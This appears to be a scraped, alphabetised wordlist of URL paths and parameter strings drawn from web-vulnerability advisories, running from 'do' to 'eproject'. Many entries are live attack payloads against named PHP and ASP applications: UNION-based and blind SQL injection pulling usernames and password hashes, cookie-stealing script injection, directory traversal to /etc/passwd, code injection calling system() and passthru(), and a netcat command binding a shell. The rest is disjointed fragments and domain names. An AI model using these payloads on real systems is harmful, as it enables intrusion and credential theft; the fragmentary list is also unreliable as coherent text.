do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstNam
do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username='"><script>alert(document.cookie)<
/?do=productdetail&id=1+AND+SUBSTRING(@@version,1,1)=4 << false
/?do=productdetail&id=1+AND+SUBSTRING(@@version,1,1)=5 << true
/?do=profile&action=edit
dopublish.php
do \r\n";
dosearch.php?RESPATH=[[Sh3LL Script]]
dossier.class.php?path_om=[Shell]
dossier.class.php?pservice.class.phpcategorie.class.php?path_om=[Shell]
dostuff.php?action=modify_user 
dosyalar
dosya.php?no=935
dosyayukle
dotaopenstats
dotaStats
DotDefender.js"><
dot.hazard.free.fr
dotpro
dotproject
dotProject%20Version%202.1.3
dotProject%20Version%202.1.6
dotproject.net
[dotProject_path]
doupload.php?box=<?php echo $_REQUEST["box"]?>&func=2" METHOD=post ID=form1 NAME=form1 onSubmit="javscript:return checkFile(form1);"> 
down
downlinebuilder
downlinebuilder.php
download
#download
+download
download  
download #
download # 
download,
download' ],
download]
download	  ||
Download
/?Download
Download      #
download12
/?download=2532Gigs_stable
download,33.html
/?Download*5
download,5.html
download.asp
Download.asp #
download.asp?pid=4&rid=34
download.aspx?file=ASP_UELite
Download.aspx?filename=..
download.aspx?FileNameAttach=
download_attachment.php?aid=9ab1c5afa4946ca0030271736f38c83a
download_attachment.php?aid=admin
download.berlios.de
download_cacti.php
downloadcalcbuilder
download-cat16";
download_cats.php?
download-center.html
download-centreon-enterprise-server
download.cgi
download_checker.php?filename=..
download-clan-cms 	   		             |
download-clan-cms 	   		              |
download-clan-cms 	   			     |
download.cmd.php?GLOBALS=[Evil Script]
downloadcsv.php");
downloadcsv.php?file=..
downloadcsv.php?gfcommon=[Shell]
download_demo
Download-document
Download-document.html?gid=47 
">Download DomPHP 0.81
download-efront.html
download_en.html
download_en.php
downloader.php?filename=U01BLURC&referrer=hots
downloader.php?filename=UEhfUGV4cGxvcmVy&typ=0
download_file
download?file=1
download_file1.html
/?download&file_name=<script>alert(0)<
download_file.php
downloadfile.php?dwnfile=..
downloadfile.php?dwnfile=[LFD]
download_file.php?path=..
downloadfile.php?path=
downloadfiles
downloadform.php?txn_id="><script>alert(document.cookie)<
download-freepbx
download_gallery
download.html
download.html                              =             
download.html                                             ]
download.html?dl=18
download.html?f=Flatnux-Next
download.html?func=select&id=2
download.html?item=18
download.html?path=
download.html?path=config.inc.php
download.html ( WEBInsta. CMS 0.3.1 )
download-image.php?href=..
download-impleo
downloading.php?
downloading.php?group_id=149698&use_mirror=puzzle&filename=versado_CMS.rar&80698096
downloading.php?groupname=phpbuilder&filename=phpbuilder-0.0.2.tgz&use_mirror=switch
download_invoice.php?invoiceid=<?php system("calc.exe"); ?>
download.joomlaportal.ch
download_launch.php?filename=..
download.limesurvey.org
downloadlist.php?action=download&id=53&sprache=en
download_manager
download-manager.php?id=228
download.moodle.org
downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x2E2E2F2E2E2F61646D696E2F636F6E6669672E706870)
downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x[file name in hex])
download.nexen.org
download_now.php?target=9999999999999[SQL]
download_pdf
download.php
download.php 
download.php  
download.php                   #
download.php ]
download.php?
download.php] 
download.php	          	                      |
download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=
download.php?action=byuser&userid=1&title=D3vil-0x1<
download.php?admin_theme_dir=..
download.php?a_k=Jh5zIw==&i=20&m=2&f=..
download.php?categoria=E-Commerce&arquivo=24
download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ws(0x3a,user_name,password,last_login),0,0,0,0+from+idesk_user--
download.php?cat_id=sql
download.php?create">
download.php?dfile=..
download.php?dlfilename=EVIL
download.php?dlfilename=index.php
download.php?doc_url=
download.php?download=..
download.php?download=eliteCMS
download.php?download=[File Disclosure]
download.php?download_key=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
download.php?email=bloginator&ID=0
download.php?f=
download.php?f=..
download.php?fgid=-1 AND 1=BENCHMARK(5000000,MD5(CHAR(87,120,109,121)))
download.php?fichier=.
download.php?Fichier_a_telecharger=..
download.php?fichier=passwd&Directory=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F
download.php?Fichier=pfa-v6.tgz
download.php?fid=-99'%20UNION%20SELECT%200,0,0,
download.php?file=.
download.php?file=..
Download.php?file=..
download.php?file=1
download.php?file=328shell.php
download.php?file=347076
download.php?file=backup.sql
download.php?file=backup.sql <-=- You Can Download backup From Here
download.php?file=[BlindSQLi]
download.php?file=download.php
download.php?file=export0000&dir=file.type%00
download.php?file=foldergallery_3.0.2
download.php?file=foldergallery_3.1#
download.php?fileID=22
download.php?fileID=22	   			     |
download.php?file=minibb21
download.php?filename=
download.php?filename=..
download.php?fileName=..
download.php?filename=100p97q116r97s47t112a114i111f103g114h97n109o115l47m80b72c80d47e105u115v103z50p46q122r105s112t
download.php?filename=[file]
download.php?filename=index.php
download.php?filename=[Local File]
download.php?filename=main.php
download.php?filename=resdemo.tgz
download.php?file=[path_file]&download=1
download.php?filesec=sitemap&filetype=text&file=....
download.php?file=|SQL 
download.php?fname=[SOURCE FILE]
download.php?fname=upload
download.php?id=..
download.php?id=1107
download.php?id=1108
download.php?id=1178&clas=0
download.php?id=127
download.php?id=1575
download.php?id=16
download.php?id=1627
download.php?id=1737
download.php?id=1880
download.php?id=1"\r\n";
download.php?id=2%
download.php?id=20
download.php?id=%20and(select%201%20from(select%20count(*),concat((select%20(select%200x53514c20417661696c61626c65206279205375626861736844617379616d)%20from%20`information_schema`.tables%20limit%200,1),floor(rand(0)*2))x%20from%20`information_schema`.tables%20group%20by%20x)a)%20and%201=1
download.php?id=2212
download.php?id=23
download.php?id=26
download.php?id=27
download.php?id=33>
download.php?id=353
download.php?id=480
download.php?id=5767
download.php?id=627
download.php?id=7
download.php?ID=813   +
download.php?id=9
download.php?id=-999'< SQL Command >
download.php?id=c16a5320fa475530d9583c34fd356ef5
download.php?id=[SQL] 
download.php?item=..
download.php [ just a example ^^ ]
download.php?mid=14
download.php?modfunc=file&version=2.2
download.php?n=1&dl=2&o=3&v=4'union+all+select+concat(id,':',passwd)+from+operators%23
download.php?Number=42227[SQL] 
download.php?op=getit&lid=28
download.php?package=QuoteBook ]
download.php?p=get_inselphoto                                                        |
download.php?phpbb_root_path=[attacker]
download.php?r1=1.95&r2=1.96&view=patch&pathrev=MAIN
download.php-resource.net
download.php?script=138
download.php?SortBy=1&fdir=.
download.php?src=..
download.php?src=[Local File]%00
download.php?s=[SQLi]&id=2324 
download.php?testPath=.
download.php?u=latest
download.php?url=696e636c756465732f636f6e7374616e74732e706870
download.php?url=[Encoded url]
download.php?view.1402
download.php?view.1843
download.php?view.19
download.php?view.73
download.planerd.net
download_response.html&download=direct
downloads
downloads] 
Downloads
/?Downloads
downloads2
download.savannah.gnu.org
download.savannah.nongnu.org
downloads.coronamatrix.org
downloadscript
downloads-dbhcms-114-1-69-en.html
downloads?func=fileinfo&id=33
Download-Shop
download.shtml
downloads.html
downloads.html Your Name & Site URL :p
downloads-id1-web-news-1-4.html
download.simplemachines.org
downloads.localhost.be
downloads-manager
downloads-manager<i>
downloads.msxstudios.de
downloads\n";
download.softpedia.ro
Downloads-op-getit-lid-599-noJpC-.html
download?source=directory
download?source=directory]
download.sourceforge.net
downloads.php
downloads.php                                                      #
downloads.php?action=showfile&id=1
downloads.php? category=999'% 20union%20select% 206,2,3,4,5, 1,7,8
downloads.php?cat_id=1&download_id=91
downloads.php?cat_id=1&orderby=IF(0,1,(SELECT+1+UNION+SELECT+2))
downloads.php?cat_id=1&orderby=IF(1,1,(SELECT+1+UNION+SELECT+2))
downloads.php?cat_id=1&orderby=waraxe
downloads.php?cat_id=23&download_id=264
downloads.php?cat=[SQL]
downloads.php?do=file&id=1 	#
downloads.php?do=file&id=533
downloads.php?language=[LFI]
downloads.php?page_id=67
downloads.php?row_y5_site_configuration[templates_folder]=[EV!L]
downloads.php?view=detail&id=3
downloads-show-106.html
downloads.sourceforge.net
downloads.tuxfamily.org
downloads.wordpress.org
download.tomex.org
download_trial.php
download?utm_expid=6384-3&utm_referrer=http%3A%2F%2Fsourceforge.net%2Fprojects%2Ft-dahmail%2F
download?version=current_ossim_iso
download.xitara.net
download.xml#xms-2.6
download.zehnet.de
download.zehnet.de             
downlot.php?file=..
downlot.php?file=[LFD]
down.php?&bbs_code=rgboard_pds&bd_num=1757&key=0&mode=down
down.php?filename=..
down.php?file=ZanfiCmsLite.rar
down.php?id=6
down.php?url=
down_pro.php?id=30
downtrack
dox
dp2009
dpage.php?docID=-1+union+select+1,2,concat_ws(0x3a3a,Username,Password)+from+admin
dpage.php?docID=[SQLi]
DPGguestbook
dpoll.php?resource=free_script ]
[dp_path]
dpQXMK
DProtect
dp-thumbnail
drag-drop-file-uploader
[dragon_path]
drakecms.org) ; 
drakecms.sourceforge.net
drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20
draw_tree.php
dreamblog
DreamlorD
dreamnews
dreamnews.php
dreamnews-rss.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--
dreampics.php
DreamStats_System;54520
Dren's%20PHP%20Uploader.rar #
drg
drinks
drivers.php">
droit.class.php?path_om=[Shell]
droit.class.php?path_om[Shell]
droos
dropbase.php?tabls=' or 1=1 --
Dropdown
dros
DRS
druckansicht.php?s=13 and 1=2 union select 1,2,3,4,5,concat(cName,0x3a,cPass),7,8,9 from tadminlogin--
drucken2.php?config[fsBase]=[evil_scripts]
drucken.php?config[fsBase]=[evil_scripts]
drunkengolem
drupal
drupal5
drupal-6.22
Drupal-CMS-7.12-Cross-Site-Request-Forgery.html
drupal-cms-712-latest-stable-release.html
<drupal_ip>:80
drupal.org
drupal.org) is a robust content management system (CMS)
dryden
ds3.bbminc.net
 dschwab9 179
dsdownload
DSecRG
DSecRG&xoopsConfig[language]=..
dslogin
DstFix.php?GLOBALS[sugarEntry]=1&theme=..
DTD
dtd.php?path=[Bad Code]
dt.gif+onload=alert(213771818860)>
dt-register.html
dtv
dual
DUamazon
DUamazonPro
dubsite
Dubsite
duga_vest.php?id=1[SQL]
duga_vest.php?id=-217+UNION+SELECT+1,2,3,group_concat(id,0x3a,username,0x3a,password,0x3a),5,6,7,8+from+members--
duhokfrm
DumbStore.php?_ENV[asicms][path]=
dump
dumpdb.php?outfile=..
dump.php
dungeon
dupa;
dupa.php
duyuru.asp?id=6+union+select+0,kul_adi,sifre+from+uye+where+id=1
dv10dis
/?d=VCXHBRO9                                                                                                $
DVD
dvd.php
dvd-zone-dvd-rental-script.html
dv_gbook.php?d=0&f='"><script>alert(document.cookie)<
dvmet.free.fr
dw
dw ]
dwalker.co.uk
dwingmods
dwoprn.php?f=connectdb.php
dwt_editor
dymy-user-agent                #
DynamicFields
dynamicpad.org
dynamicpages
dynamicphotogallery
dynamisch
dynpage
dynpage_load.php?file=..
dynpg
dynpg_path
DynPG_path
dYRoLbwWu_zR
dz
dz4web.info
dzcode.tk
dzcp
<dzcp>
dzcp1.5.3
dzcp-zone.de
e
#e;
e%00
e0adbeb40435
e107
e107_0615
e107_0.7
e107102
e107%20v1.0.1
e107%20v1.0.2
e107_admin
e107coders.org
e107_config.php 
e107.cvs.sourceforge.net
e107mygalleryplugin
e107.org
e107_Path
e107_plugins
e107 yeat an4rchy 1\n";
e4100.asp?id=2[CODE]
e4200.asp?id=1259892693[CODE]
e4700.asp?id=-1705492526 (SQL)
e6
e69a16b6e630
e-ark
earnings.php
easton.4fd.us
ea-style.de
easybannerpro
easy-banner-pro-banner-exchange-script.html
easybiller
easyblog
easyblog.html
EasyBookMarker
EasyCalendar
easyclanpage
Easy-Clanpage
easy-clanpage.de
easyclassifields
EasyClassifields
easy-contact-form-lite
easy-contact-forms-exporter
easycreate
easycreate  )
easy-form.class.php 
easygallery
easy_image
EasyNews
[easy_news_path]
easyonlineshop
easypublish
easyshop
easyshop.php?choose_category=1&category_id=-1".$send);
easytemplate.php?cache=[EV!L]
easytemplate.php?fn=[EV!L]
easywebmake
ebayclone2009
ebaystore
ebay_style
eb_members
eboli
ebookstore
e-Book_Store_web_site_script_bundled_with_120_ebooks_with_resellers_right.html
ecan
ecard.php?ecard=418337 (Sql)
ecards1
e_cart
e-cart
ecat
ecdis
echo.or.id
echo.or.id>echo<
eclime
ecms37
ecms3.7-free.rar&
ecms.getox.net
ecom
ecomansys.sourceforge.net
ecommerce
e-commerce
> E-commerce
E-Commerce
e-commerce-bridges
ecommerce.php
econda
ecp
ecp_version2
ecrire
ecshop
ed
edbe3f8f4524.png
edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit
eddy
ed-engine
edi_form.php?CLASSPATH=[AvriLhea]                
edi_save.php?CLASSPATH=[AvriLhea]                
edit
__edit
edit.
Edit
edit1.php?action=confirm_data&code=1'
EditAccountPage.class.php?base_path=[evil_scripts]
editAdmin
edit_adminpage.php?id="><script>alert(123);<
edit_adminpage.php?op="><script>alert(123);<
edit_admin_user.php?eventid=10
edit_advert.php" method="post">
edit_alert.php?alertid=11%20UNION%20SELECT%201,2,username,password,5,6,7,8,9,10,111,12,13,14,15,16,17,18%20FROM%20users%20--%20
editar.php?id=1  <- SQL
edit_backup_users.php?user=%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C
edit_blog
editCampaign.php?campaignId=-2'+union+select+concat(password,0x3a,username)+from+adman_users
edit_client.php?id=1(SQL Injection)
editclient.php?id=CLIENTID&action=update" method="post" name="main" enctype="multipart
editcommentenduser.asp?sys_comment_id=1'
editComments.php?comp=1%27+union+all+select+1,2,@@version,4,5,6,7,8,9,10,11--+
editconfig_gedcom.php?gedcom_config=..
EditCustomFields
edit_details.php?ID=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
editdiscussion
EditDomainPage.class.php?base_path=[evil_scripts]
EditDomainServicePage.class.php?base_path=[evil_scripts]
edit_email.php?&id=X%27+union+select+1,2,3,4,5,6+--+
editenquiries.php?id=7[BLIND SQL-INJECTION]
edit_entry_handler.php?gfwww=[Shell]
edit_entry.php?gfplugins=[Shell]
editerfichier.php?chemin=.&fichier=header.php&type=Source 
edit_escalation_path.php?id=-1%20union%20select%201,version%28%29,user%28%29,4,5,6,7,8 ,9
edit_escalation_path.php?id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C
editeur
edit_event.php?eventid=1%20union%20select%201,2,3,username,password,6,7,8,9%20from%20users%20where%20userlevel=9%20limit%200,1
editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--
edit?execution=e1s1&userId=[uid]
editfeedback.php?id=[CROSS SITE SCRIPTING]&postsearch=S&cmbSearch=&page=1&txtkey=
editfile.php
edit_footertext.php
EditForm
editGroup" method="post" name="main">
edit_group.php?op=edit&group_id=1"><script>alert(123);<
EditHeader.Admin.class.php?_CONF[path]=[Evil_Script]
edithistory.php 
EditHostingServicePage.class.php?base_path=[evil_scripts]
editimage.php?clientid=4806666
editimage.php?clientid=4871187
editimage.php?clientid=[MemberAdminPass] )
edit_importer
edit.index.php (Edit index Home)
EditInfo.php">
editini.php?album=
EditIP.Admin.class.php?_CONF[path]=[Evil_Script]
EditIPofURL.Admin.class.php?_CONF[path]=[Evil_Script]
edit_item.inc.php?install_root=[Shell]
editit.html?dir=
edit_layer_handler.php?gfplugins=[Shell]
edit_layer.php?gfplugins=[Shell]
editlisting.php -d
edit?lulz=%s\\\' """ 
edit_main_pages.php
editme
edit_menu_item_ajax HTTP
edit" method="post" >
edit\\\' method=\\\'post\\\' """ 
edit" method="POST">
edit_new.php?Paths[extensions_path]=
edit_new.php?Paths[extensions_path]=ftp:
editnews.php?id=NEWSID&action=update" method="post">
edit_nonusers_handler.php?gfplugins=[Shell]
edit_nonusers.php?gfplugins=[Shell]
edit_object.php
edit_one_pic.php?id=1&what=picture
edit" % (options.target, options.target_path))
editor
Editor
editor2
editormonkey
editor_pages.php?id=1'"><script>alert(document.cookie)<
editor.php?action=show_config&mapname=..
editor.php?action=tempedit&m=[base64 password]&te=[local_file]&dir=[local_dir]
editor.php?s=null+union+all+select+1,2,3,4,5,concat_ws(0x3a,username,password)+from+security+where+user_id=1--&t=1
editor.php?type=new&actiontype=editsite&templateid=128'&tempsiteid=-1 union all select [SQL Injection] --
editor_registry.php?xoopsConfig[language]=..
editors
editorTypetool.php?cmd=DIR&meskin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
EditPaymentPage.class.php?base_path=[evil_scripts]
edit_photos.php?ID=39&action=edit">
edit.php
edit.php"
edit.php?act=comment&comp=2&id=[SQLi]
edit.php?action=edit&post=1 [SQL CODE]
edit.php?a=pre&submit=&sid=siteidnumber--
edit.php?ds_id=10&id=4 AND (select @@version)='5.5.16-foo' #returns a FALSE value for the query
edit.php?ds_id=10&id=4 AND (select @@version)='5.5.16-log' #returns a TRUE value for the query
edit.php?ds_id=1&id=4 AND 1=1 #returns a FALSE value for the query
edit.php?ds_id=1&id=4 AND 1=1 #returns a TRUE value for the query
edit.php?edit=footer" method="post">
edit.php?edit=header" method="post">
edit.php?f_country_code=%27%20union%20select%201,2,version%28%29%20--%202
edit.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM%20runcms_users%20WHERE%201
edit.php?id=-1%27+union+select%201,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%23
edit.php?id=1 AND 1=IF(1<2,2,1)
edit.php?id=1 AND 1=IF(1>2,2,1)
edit.php?id=-1 union all
edit.php?id=-1 union select 1,2,3,id,firstname,lastname,7,address,mobile,10,11,12,email,14 from addressbook
edit.php?id=[SQL]
edit.php?id=[sql-injection]
edit.php?id[]=war'axe
edit.php?lang=..
edit.php?mainpath=[RFI]
edit.php?name=..
edit.php", "ocaction=1&pid={$sql}"))) { $hash .= chr($chars[$i]); print chr($chars[$i]); break; } 
edit.php", "ocaction=1&pid={$sql}"))) { $user .= chr($chars[$i]); print chr($chars[$i]); break; } 
edit.php?page=SandBox&suck_url=.
edit.php?page=wp-db-backup.php&backup=..
edit.php?post_type=foxypress_product&page=affiliate-management" method="post">
edit.php?post_type=foxypress_product&page=affiliate-management&mode=delete_banner&banner_id=123
edit.php?post_type=foxypress_product&page=affiliate-management&mode=view_banner&banner_id=0+UNION+SELECT+1,1,(SELECT+CONCAT_WS(0x3a,user_login,user_pass)FROM+wp_users+WHERE+ID=1),1,1,1
edit.php?post_type=foxypress_product&page=affiliate-management&mode=view_banner&banner_id=waraxe
edit.php?post_type=foxypress_product&page=affiliate-management&mode=view_past_details&affiliate_id=0+UNION+SELECT+1,1,1,1,1,1,1,1,(SELECT+CONCAT_WS(0x3a,user_login,user_pass)FROM+wp_users+WHERE+ID=1),1,1
edit.php?post_type=foxypress_product&page=affiliate-management&mode=view_past_details&affiliate_id=waraxe
edit.php?post_type=foxypress_product&page=affiliate-management&orderby=management_asset_name&order=waraxe
edit.php?post_type=foxypress_product&page=affiliate-signup
edit.php?post_type=foxypress_product&page=inventory-category" method="post">
edit.php?post_type=foxypress_product&page=inventory-category&mode=delete&category_id=123
edit.php?post_type=foxypress_product&page=inventory-category&mode=delete&category_id=waraxe
edit.php?post_type=foxypress_product&page=inventory-category&mode=delete_image&category_id=123
edit.php?post_type=foxypress_product&page=inventory-option-groups&action=deleteoptiongroup&optiongroupid=123
edit.php?post_type=foxypress_product&page=manage-emails&action=delete&id=123
edit.php?post_type=foxypress_product&page=manage-emails&mode=edit&id=<body+onload=alert(123);>
edit.php?post_type=foxypress_product&page=manage-emails&mode=edit&id=waraxe" method="post">
edit.php?post_type=foxypress_product&page=order-management&action=deletenote&note=123
edit.php?post_type=foxypress_product&page=order-management&status="><
edit.php?post_type=foxypress_product&page=reports&report=2" method="post">
edit.php?post_type=foxypress_product&page=status-management&action=delete&status=123
edit.php\r\n";
edit.php?site=-12%20union%20select%200,1,username,password,4,version(),user(),7,8,9,10,11,database(),13,14,15,16,17,18++from+users--
edit.php?site=-12 union select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
edit.php?site=[sql]
edit.php?tab=object&op=new&&tyyp_id=20&profile_id=,<script>alert(123);<
edit.php?torrent_id[]=war'axe
edit_pilt.php
Edit [PLESKSESSID cookie]
editpost.php?Cat=X&Board=X&Number=1'%20OR%20'a'='a 
editpost.php?fbpassword="><script>alert(document.cookie)<
editpost.php?fbusername="><script>alert(document.cookie)<
editpost.php?forumid=1&post=3 UNION SELECT userid,login,password FROM cf_user INTO OUTFILE &#039;
editpost.php?pid='[sql_query]
EditProductPage.class.php?base_path=[evil_scripts]
editprofile.php
editprofile.php?action=abos2&digest[1'SQL_CODE_HERE]=1
editprofile.php?action=addabo
editprofile.php?action=profile"
editprofile.php?action=removeabo
editprofile.php" method="post" name="main">
edit_profile.php?op=edit&did=1&pid=<script>alert(123);<
editprofile.php?skill_edit[]=1);select+1,2,3,version()+as+title,5,6;+--+&MultiEdit=Edit
editprofile.php?user=admin" method="post">
editprofile.php?user=x"><%73cript>alert(document.cookie);<
editproject.php?id=1&action=update&docopy=f
editquiz.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8--
editquota.html?email=<script>alert('vul')<
edit_report_handler.php?gfplugins=[Shell]
edit_report.php?gfplugins=[Shell]
edit_reseller">
editresume_next.php?rid=47
editresume_next.php?rid=[id] )
EditServerPage.class.php?base_path=[evil_scripts]
editsettings.php
editsettings.php (1- edit the e-mail 4 admin and Searshing 4 admin name)
edit_shop_editorFrameset.php?bid=%22onload=%22alert%280%29
/?edit=spec_view&edit_id=[SQL]
edit_table_cell_props.php?bgcolor=<
edit_table_cell_type_wysiwyg.php?stylesheet=">[code] 
edit_table_props.php?bgcolor=<
edit_table_row_props.php?bgcolor=<
edit-tags.php?taxonomy=category&orderby=[SQL
edit-tags.php?taxonomy=link_category&orderby=[SQL
edit-tags.php?taxonomy=post_tag&orderby=[SQL
edit_template.php?gfplugins=[Shell]
edit_tmsp.php?mosConfig_absolute_path=[evilcode]
edit_top_feature.php?include_connection=[SHELL]
edit_topics_feature.php?include_connection=[SHELL]
editu.php
EditUrl.php?url=-7+union+select+1,password,3,username+from+admin--
edituser.asp">
edit_user_handler.php?gfplugins=[Shell]
edituser.php3" METHOD="GET" AUTOCOMPLETE="OFF" NAME="EditUsrForm">
edituser.php?boardid=&amp;agree=1
edit_user.php?gfplugins=[Shell]
edituser.php?id=16 onSubmit="return submitHandler(document);">
edituser.php?id=USERID&action=update" method="post" name="main">
edituser.php" method="POST">
edituser.php? num=[userid]
edit_user.php?tab=account&user_id=19&group_id=1&op=edit&op2=save&username=admin&password=hacked&password_confirmation=hacked&pass_expires=01.01.2029&is_predefined=1">
edit_user.php?user=1" method="post">
edituser.php?userid=1&language=pt&sortby=st rLastName&sortdir=ASC&start=1
edit_user.php?user_id=3 UNION SELECT 1,2,version(),4,USER(),6,DATABASE(),8,9,10,11,12--
edit?usp=sharing
EditView.php?GLOBALS[sugarEntry]=1&theme=..
edlink.php?linkid=-1' union all select
edmondhui.homeip.net
eDNews_view.php?newsid=-99
edocument
edocument_basic_view_menu.php?system_path=[evil_scripts]
edocument_document_model_create.php?system_path=[evil_scripts]
edocument_document_view_list.php?system_path=[evil_scripts]
edocument_edoccorrectionclass.php?system_path=[evil_scripts]
edocument_edocerrorcodeclass.php?system_path=[evil_scripts]
edocument_edocformclass.php?system_path=[evil_scripts]
edocument_edocform_view_listactive.php?system_path=[evil_scripts]
edocument_edocform_view_listclosed.php?system_path=[evil_scripts]
edocument_edocresponsibleclass.php?system_path=[evil_scripts]
edownload.php
edownloadscart
edscontacts
eduforge.org
ee
eEmpregos
[ee_path]
eetool
EF-675
effect.php?page=[file]
effetsecondaire.class.php?path_om=[Shell]
efficiency.inc.php
efiction
eFlower
efriends.htm
efrontlearning
eg;
eg; 
egallery-arbitrary-file-upload-vulnerability.html']
eggblog
[EggBlog]
eggBlog%204
eggblog_members
eggblog.net
eGhzJ.png
egroupware
egs_10rc4_php5_incl_xpl.html                *
egyplus.org
ehcp
ehmorgan.net
eirc
eirc-init.php?gfplugins=[Shell]
eirc.php?gfwww=[Shell]
eJAyw5
ejemplo
~ekenda2
ekinboard
eledicss.php?nid=0&cd=themes
elegirConexion.php
elemata
Elemata%203.x
elematacms
ElementITMultiPowUpload1.7.swf">
[element name]-[mysql_insert_id()].php
elements
elementz.php?lilil=400&ubild=hacker&pa=hacker
elenco_attivita.php?id_cat='101
elenco_attivita.php?id_cat=[SQLI]
elgg.org
Elite%20Bulletin%20Board%20v2
elite-board
elite-board.us
 - Elite Bulletin Board is an advanced Bulletin Board program that provides advanced features such as CAPTCHA, sub-board, skinning ability, multilingual, commercial password encryption, and much more.
elitecms.net
Ellipsis%20Security%20Test
EllipsisSecurityTest
Ellipsis+Security+Test
EllipsisSecurityTe st
elms
elouais-force-download-script
elxis-cms
email
email]
email][
EmailAccountsUpd_process.asp?KeyID=1 order by 2
email_an_benutzer.php?config[fsBase]=[evil_scripts]
emailarticle.php?submit=submit&email=example@example.com&youremail=example@example.com&id=100 UNION select username,email,password from mos_users where id=1
emailfilter
emailfriend
email.html" method="post">
EmailInvoicePage.class.php?base_path=[evil_scripts]
emailList.php
EmailMan
email.php  
email.php?AgentID=-47+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,database(),0x3a,version()),12,13,14,15,16,17,18,19,20,21,22,23+from+admin--
email.php?AgentID=&ListingID="><script>alert()<
email.php?AgentID=[SQL]
email.php?cmd=ls -la 
email.php?forum_contact="><script>alert(document.domain);<
email.php?header_prog=[Evil_Script]
email.php?&h_id=[sql] 
email.php?ID=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user())+LIMIT 1,1
email.php?id=%27%3E%3Cscript%3Ealert(document.cookies)%3C
email.php?ID={EV!L EXPLO!T}
email.php?ID=SQL
email.php?news.1) it's
email_request.php?user_id=[malicious code]
Emails
email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using
emailsender.php?row_y5_site_configuration[templates_folder]=[EV!L]
EmailTemplates
email_templates.php?a=edit&tpl=<script>alert(0)<
emall
emall.asp
embadmin
embed
emerge-1.0
emerge2004.net
emergecolab
emetteur.class.php?path_om=[Shell]
~emgent
emil
emm
emoblog
emorealty
emplacement.class.php?path_om=[Shell]
emp_login.asp
Employee
employer.php" class="text_12">Permissions:<
employer.php" form method="post" id="frmMain">
employer_reg.php
employers
empris
[Empris_path]
empty>($url)){
ems
emultisoft.net
en
EN
enable-media-replace
enanocms.org
encapscms-0.3.6
encapscms_PATH
encapsgallery
encode.php?t=includes
encode.php?t=[Url]
'+encodeURI(C);
'+encodeURI(C);<
" enctype="multipart
endon
endonesia
eNdonesia
[eNdonesia 8.4]
#{endpoint}#{base}index.php?p=upload_personal_document"
enduser
energine.org
enetman
enews
eng
eng.adCreate.php?sysFileDir=[shell]
eng.adCreateSave.php?sysFileDir=[shell]
eng.adDispByTypeOptions.php?sysFileDir=[shell]
eng.createRoom.php?sysFileDir=[shell]
eng.forward.php?sysFileDir=[shell]
engine
engine.php?action=log-reset&type=ih_options();passthru(whoami);error
engine.php?do=download&file=..
engine.php?do=redirect&url=data:text
engines
english
english.islamweb.net
english.php
eng.pageLogout.php?sysFileDir=[shell]
eng.resultMember.php?sysFileDir=[shell]
eng.roomDeleteConfirm.php?sysFileDir=[shell]
eng.saveNewRoom.php?sysFileDir=[shell]
eng.searchMember.php?sysFileDir=[shell]
eng.writeMsg.php?sysFileDir=[shell]
enigmail.mozdev.org
en.inc.php?LANG=[evilc0de]
enmp
en_Pricing.html
enproject.codelib.co.kr
enq
enquiry_detail.php?rID=-20'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--%20-[SQL-INJECTION!]
en.rstzone.org
en.sourceforge.jp
enter
enter-cms.rar
enter.php)
enterprise.xwiki.org
entertainers.php?theme=..
entertainment-portal.html ]
enth3
enth_3.1.4
enthusiast
ent_i.jsp?endTime=<script>alert("ZSL");<
ent_i.jsp?entSortOrder=desc%27
ent_i.jsp?entSort=time%27
ent_i.jsp?startTime=<script>alert("ZSL");<
entrans
entreprise.class.php?path_om=[Shell]
entresec>
entries
entries.php?urltitle='-1+UNION+SELECT+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13+FROM+phsblog_users
entry
entry>";
/?entry_id=3
/?entry_id=[Blind SQL]
entry.php?hash=19e9abf204087d0765f81c5bfb1a6fef&categoryid=1&orderby=10&action=
entry.php?hash=19e9abf204087d0765f81c5bfb1a6fef&categoryid=1&orderby=10&action=test
entry.php?message=<script>alert(document.cookie);<
en-us
en-US
env_db.php
environ
environ%00
environ%00              #
environ%00z
[envo]
envolution
envolution          #\n";
en.wikipedia.org
eo4aWVV_zFd
eobre_grupo_lleal.php?id=[sql]
e-o-u.org
e-o-u.org   #
epal
epay
e-pay
epay_enterprise.htm*
epayroll.sourceforge.net
eph
e-php
episode.php?name=..
Epistemon_V1.tgz
epnadmin.pierrefitte93.fr
e-portfolio
e-portfolio-description.html
eproject
